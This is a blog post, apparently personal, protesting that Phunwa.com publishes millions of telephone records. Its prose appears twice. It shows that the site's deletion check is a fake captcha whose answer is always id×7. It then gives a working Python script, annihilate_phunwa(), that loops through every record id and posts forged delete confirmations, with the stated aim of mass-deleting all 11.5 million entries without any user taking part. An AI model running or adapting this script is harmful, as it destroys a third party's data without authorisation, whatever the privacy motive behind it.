Alright, I can't really call this an app, it's more like a search engine ... that allows you delete its records.
This website pissed me off as it makes ~11.5 million telephone records and related information(name,address) publicly searchable and indexable. I guess Google has already indexed all of the pages, and even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches. It supposedly takes its data from BSNL's searchable but non-indexable directory. I can go on about how this is a privacy issue but I'll leave that for another post.
There's a tiny delete button at the bottom that takes you to such a page.
There's an id parameter (passed through the content body) associated with each telephone record, which I suppose is the database id of the record. The numbers of the equation are a textual part of the DOM and can be scraped to automate deletion of a record. I wrote a Python script to parse the HTML using regex and retrieve those numbers:
Which gives the following output:
For each increment of the id, the answer increments by 7(even though the two numbers themselves are generated different each time) which can only mean one thing:
Whoever designed this thing never heard of re-captcha. It doesn't even verify if the referrer(which is the URL containing the phone-number associated with the id) is correct, but that's too much to ask for considering the confirmation method they chose to implement is answer = id*7
The total number of records could be around 11,547,208. That's the highest the id goes to before returning a 500. In theory, it is thus possible to delete every record on Phunwa.com without user-intervention at any point. Except for hiring an EC2 instance and running this script.
I may update this code with one that implements threading.
This website pissed me off as it makes ~11.5 million telephone records and related information(name,address) publicly searchable and indexable. I guess Google has already indexed all of the pages, and even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches. It supposedly takes its data from BSNL's searchable but non-indexable directory. I can go on about how this is a privacy issue but I'll leave that for another post.
There's a tiny delete button at the bottom that takes you to such a page.
There's an id parameter (passed through the content body) associated with each telephone record, which I suppose is the database id of the record. The numbers of the equation are a textual part of the DOM and can be scraped to automate deletion of a record. I wrote a Python script to parse the HTML using regex and retrieve those numbers:
equation = re.compile('([0-9]*[0-9]+)\ \+\ ([0-9]*[0-9]+)') p_url = 'http://www.phunwa.com/removeentry/' for counter in range(800000,800005): params = { 'id':counter, 'Remove this entry':'Remove this number from the site' } req = urllib2.Request(url=p_url,data=urllib.urlencode(params)) phunwa = urllib2.urlopen(req) source = phunwa.read() numbers = equation.findall(source) for num in numbers: print "id: %s | %s + %s = %s" % \ ((counter,num[0],num[1],(int(num[0])+int(num[1]))))
Which gives the following output:
id: 800000 | 119805 + 5480195 = 5600000 id: 800001 | 787730 + 4812277 = 5600007 id: 800002 | 534978 + 5065036 = 5600014 id: 800003 | 155396 + 5444625 = 5600021 id: 800004 | 88748 + 5511280 = 5600028
For each increment of the id, the answer increments by 7(even though the two numbers themselves are generated different each time) which can only mean one thing:
Whoever designed this thing never heard of re-captcha. It doesn't even verify if the referrer(which is the URL containing the phone-number associated with the id) is correct, but that's too much to ask for considering the confirmation method they chose to implement is answer = id*7
The total number of records could be around 11,547,208. That's the highest the id goes to before returning a 500. In theory, it is thus possible to delete every record on Phunwa.com without user-intervention at any point. Except for hiring an EC2 instance and running this script.
import re import urllib import urllib2 def annihilate_phunwa(): p_url = 'http://www.phunwa.com/confirmdelete/' for counter in range(1,11547209): params = { 'id':counter, 'answer' : (counter*7), 'Confirm Delete' : 'Submit Query' } try: req = urllib2.Request(url=p_url,data=urllib.urlencode(params)) phunwa = urllib2.urlopen(req) except urllib2.HTTPError,e: if e.hdrs['Status'] == '500': print 'id=%s may already be deleted!' % ((counter,)) else: print 'Something else has gone wrong!' annihilate_phunwa()
I may update this code with one that implements threading.
No comments:
Post a Comment